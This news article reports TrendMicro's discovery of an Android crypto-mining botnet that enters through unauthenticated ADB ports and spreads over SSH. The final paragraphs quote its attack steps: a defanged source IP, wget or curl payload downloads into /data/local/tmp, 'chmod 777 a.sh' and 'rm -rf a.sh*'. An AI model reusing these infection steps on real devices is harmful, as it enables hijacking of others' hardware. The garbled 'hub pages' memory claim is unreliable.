TrendMicro, a Japan-based cyber security and defense company has discovered a new cryptocurrency mining malware that takes advantage of Android Debug Bridge (ADB) ports which resolve defective apps installed on Android phones and Tablets. Although the malware is targeted at Android devices, it can spread to other devices such as the Internet of Things (IoT) gadgets, according to the Coindesk’s report on June 23, 2019.
Mining Malware Detected in 21 Countries, Rampant in South Korea
Per the report, TrendMicro has discovered a new cryptocurrency mining botnet malware and its activity has been detected in 21 countries with South Korea as the most prevalent. The malware enters a user’s Android phone or tablet using the open ADB ports since the latter does not require any authentication by default before installation is made.
Once it has hijacked the user’s phone, the malware can potentially spread to any other electronic device using the device’s Secure Shell (SSH) connection. This connection allows a mobile phone or tablet to connect with other devices such as IoT gadgets. Also, devices that have already established a connection and authenticated, can connect automatically at a later time without requiring a second authentication.
Spreading Mechanism Abuses the Process of Making SSH Connections
While remarking on the latter, the cybersecurity company said: “The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.” As a result, the botnet can spread to a different device and also hijack their resources to mine crypto assets.
Another capability of the crypto mining malware is its ability to enhance the host’s memory through the creation of hub pages. What this does, is to improve the device’s memory than it actually is in order to support the mining activity and optimize mining output.
Operation of the Cryptocurrency Malware
In terms of the malware’s activity, it first enters the ADB as an IP address, 45[.]67[.]14[.]179 before it updates the working directory to “/data/local/tmp,” using the command shell. A wget command is then used to download the payload of three miners while a curl is executed if wget is absent from the hijacked system.
In addition, a miner is executed depending on which the malware has determined is the best to carry out its mining activities on the victim’s device. The choice of which malware is chosen depends on the system’s hardware, processor type, manufacturer, and architecture.
The malware also executes the command, chmod 777 a.sh as a way on changing the permission settings to enable its malicious drop in the host. It can also disguise its identity within an Android device through the use of a command, rm -rf a.sh*, which deletes the downloaded file.